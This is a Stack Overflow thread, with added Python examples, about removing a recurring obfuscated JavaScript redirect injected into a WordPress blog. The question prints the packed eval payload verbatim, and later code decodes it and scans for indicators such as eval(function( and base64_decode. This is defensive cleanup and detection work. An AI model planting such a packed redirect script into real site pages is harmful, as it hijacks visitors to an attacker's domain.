Javascript Injection prevention on Wordpress

Submitted by 我与影子孤独终老i on 2019-12-10 18:23:56

Question


My blog on wordpress gets the following malicious script injected:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))

It navigates to:

  • http://oxxtm.com/ which redirects to:
    • http://www.html5website.com/

I have already disabled a few plugins, but it seems like the problem is somewhere else, for I'm using the following plugins and they seem to have a good reputation:

  • Akismet
  • Captcha on Login
  • Free & Simple Contact Form Plugin - PirateForms (it is recommended by my Zerif Lite theme)
  • SMTP Mailer
  • WooCommerce

If I can't find the root cause, would you recommend handling the "redirect" event to keep the site running? If so, how could I handle it if there is a redirect pointing to http://oxxtm.com/ and abort it using javascript?

I tried using the onunload and onbeforeunload events, but it seems like the injected eval runs before the event manipulation is even registered.

I can see that it gets injected on different PHP pages (sometimes only one sometimes more) in wordpress and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script.

I already removed the malicious script several times, but it gets injected again & again. I need to treat the symptom while I search for the cause or the site will be out of service. However, I don't understand how the script is injected in the first place.
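To see what the packed script quoted in the question actually does, here is an added Python port of the packer's decode step (example code, not from the question or the answers). The four constants are the arguments visible in the eval(...) call above; the rest rewrites the script's own while(c--) substitution loop in Python and then resolves the %XX escapes that hide the host name.

```python
import re
from urllib.parse import unquote

# The exact arguments the injected eval(...) passes to the packer function:
# the template p, the radix a, the word count c and the word list k.
PACKED_P = '3.5.4="6://%1%0%0%9%2%8%7%1%2/";'
PACKED_A = 10
PACKED_C = 10
PACKED_K = '78|6F|6D|window|href|location|http|63|2E|74'.split('|')

BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_token(n, radix):
    """Port of the packer's e(c): n written in base `radix`, where digits
    above 35 become characters via String.fromCharCode(c + 29)."""
    prefix = "" if n < radix else encode_token(n // radix, radix)
    digit = n % radix
    return prefix + (chr(digit + 29) if digit > 35 else BASE36[digit])


def unpack(p, a, c, k):
    """Undo the p,a,c,k,e,d packer: every \\w+ token in p that is a key of the
    dictionary is replaced by the matching word (k[i], or the token itself
    when k[i] is empty), exactly as the script's while(c--) loop does."""
    words = {encode_token(i, a): (k[i] or encode_token(i, a)) for i in range(c)}
    return re.sub(r"\b\w+\b", lambda m: words.get(m.group(0), m.group(0)), p)


def decode_payload(p, a, c, k):
    """Unpack, then resolve the percent escapes that obscure the host name."""
    return unquote(unpack(p, a, c, k))


def redirect_target(decoded_js):
    """Pull the URL out of a window.location.href = "..." assignment, or None."""
    m = re.search(r'window\.location\.href\s*=\s*"([^"]+)"', decoded_js)
    return m.group(1) if m else None


if __name__ == "__main__":
    js = decode_payload(PACKED_P, PACKED_A, PACKED_C, PACKED_K)
    print(js)                                  # the single statement the packer hides
    print("redirects to:", redirect_target(js))
```

The decoded payload is one plain assignment to window.location.href pointing at the host the question names, so there is nothing to intercept on the client once it has run; the file that prints it into the page is what has to be found.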


Answer 1:


Search within all your files for the following content: eval(function(

It will show you every file that contains this code.

Otherwise, try to search for this: base64_decode

This is a function that permits decoding base64-encoded text, which is often used by malicious PHP files to inject code that you can't detect by searching for eval(

If the problem persists, answer here and I'll try to help you.
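The two searches from this answer as one added Python scan (example code, not from the answer): it walks a WordPress tree, reports every .php, .js or .html line containing eval(function( or base64_decode(, and also flags gzinflate(, which droppers commonly chain with base64_decode. The miniature site it builds in a temporary directory is constructed for the demo; the placeholder base64 string is not a real payload.

```python
import os
import re
import tempfile

# Indicator name -> pattern. The first two are the strings the answer suggests
# searching for; gzinflate( is an extra indicator added in this example.
INDICATORS = [
    ("packed_js", re.compile(r"eval\(function\(")),
    ("base64_decode", re.compile(r"base64_decode\s*\(")),
    ("gzinflate", re.compile(r"gzinflate\s*\(")),
]
SCAN_EXTS = {".php", ".js", ".html"}


def scan_file(path):
    """Return (line number, indicator) pairs for every suspicious line in one file."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for name, pattern in INDICATORS:
                if pattern.search(line):
                    hits.append((lineno, name))
    return hits


def scan_tree(root):
    """Walk a site root and return sorted (relative path, line, indicator) triples."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if os.path.splitext(fn)[1].lower() not in SCAN_EXTS:
                continue
            full = os.path.join(dirpath, fn)
            for lineno, name in scan_file(full):
                findings.append((os.path.relpath(full, root), lineno, name))
    return sorted(findings)


def build_sample_site():
    """Constructed demo tree: one clean file, one packed-JS injection in a theme
    footer, one base64 dropper in uploads, and a .txt that must be skipped."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    files = {
        "wp-includes/clean.php": "<?php function wp_clean() { return true; }\n",
        "wp-content/themes/zerif-lite/footer.php":
            "<?php wp_footer(); ?>\n"
            "<script>eval(function(p,a,c,k,e,d){return p}('x',1,1,'y'.split('|'),0,{}))</script>\n",
        "wp-content/uploads/cache.php": "<?php eval(base64_decode('Li4u')); ?>\n",  # 'Li4u' is just '...'
        "readme.txt": "mentions base64_decode( but is not a scanned type\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, lineno, name in scan_tree(build_sample_site()):
        print(f"{rel}:{lineno}: {name}")
```

Run it against the real document root with scan_tree("/path/to/wordpress"). WordPress core and well-known plugins do call base64_decode legitimately, so treat each hit as a lead to diff against a fresh download of the same version, not as a verdict; anything under wp-content/uploads that is executable PHP is the exception and is suspicious on its own.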




Answer 2:


Also, as an additional feature to protect your client side from XSS like that, I can suggest you use CSP after cleaning your backend of the injection. You can read more about it here: https://developer.mozilla.org/en/docs/Web/Security/CSP It's not a silver bullet, but it is nice to have for the protection of users.
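An added Python sketch (example code, not from the answer) of the kind of policy a WordPress site would send once the backend is clean, together with a simplified script-src decision routine so you can see which scripts it lets through: the injected inline eval(...) carries no nonce and is blocked, the theme's own inline scripts carry the per-request nonce and run, and only listed hosts may serve external scripts. The site origin, the CDN host and the /csp-report endpoint are assumptions made for the demo.

```python
import secrets
from urllib.parse import urlsplit


def make_nonce():
    """Fresh per-response nonce; must be unpredictable and never reused."""
    return secrets.token_urlsafe(16)


def build_csp(nonce, extra_script_hosts=()):
    """Assemble a Content-Security-Policy header value. /csp-report is an
    assumed reporting endpoint you would have to run yourself."""
    directives = {
        "default-src": ["'self'"],
        "script-src": ["'self'", f"'nonce-{nonce}'", *extra_script_hosts],
        "object-src": ["'none'"],
        "base-uri": ["'self'"],
        "report-uri": ["/csp-report"],
    }
    return "; ".join(f"{name} {' '.join(values)}" for name, values in directives.items())


def parse_csp(header):
    """Split a header value into {directive: [source expressions]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0]] = tokens[1:]
    return policy


def script_allowed(header, page_origin, src=None, nonce=None):
    """Simplified script-src check. src=None means an inline <script>.
    Mirrors two rules of the spec: a nonce'd inline script passes, and
    'unsafe-inline' is ignored whenever the directive also lists a nonce."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src", []))
    if src is None:
        has_nonce_source = any(s.startswith("'nonce-") for s in sources)
        if "'unsafe-inline'" in sources and not has_nonce_source:
            return True
        return nonce is not None and f"'nonce-{nonce}'" in sources
    target = urlsplit(src)
    for s in sources:
        if s == "'self'":
            if f"{target.scheme}://{target.netloc}" == page_origin:
                return True
            continue
        if s.startswith("'"):        # keyword or nonce, not a host source
            continue
        allowed = urlsplit(s if "://" in s else f"{target.scheme}://{s}")
        if allowed.netloc.lower() == target.netloc.lower():
            return True
    return False


if __name__ == "__main__":
    nonce = make_nonce()
    header = build_csp(nonce, ["https://cdn.example.test"])
    print("Content-Security-Policy:", header)
    print("injected inline eval, no nonce :", script_allowed(header, "https://example-blog.test"))
    print("theme inline script with nonce :", script_allowed(header, "https://example-blog.test", nonce=nonce))
    print("script from an unlisted host   :", script_allowed(header, "https://example-blog.test", src="http://oxxtm.com/x.js"))
```

In WordPress the header would be emitted from PHP (the send_headers action is the usual hook) and the nonce attribute added to every legitimate script tag the theme and plugins print; a nonce policy breaks inline scripts that lack it, so expect to iterate with report-only mode first. Note also what CSP does and does not cover here: it stops the injected inline script from executing at all, but it does not block a navigation on its own, so a redirect issued server-side from a compromised PHP file is untouched. It complements cleaning the backend rather than replacing it.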



Source: https://stackoverflow.com/questions/38161647/javascript-injection-prevention-on-wordpress
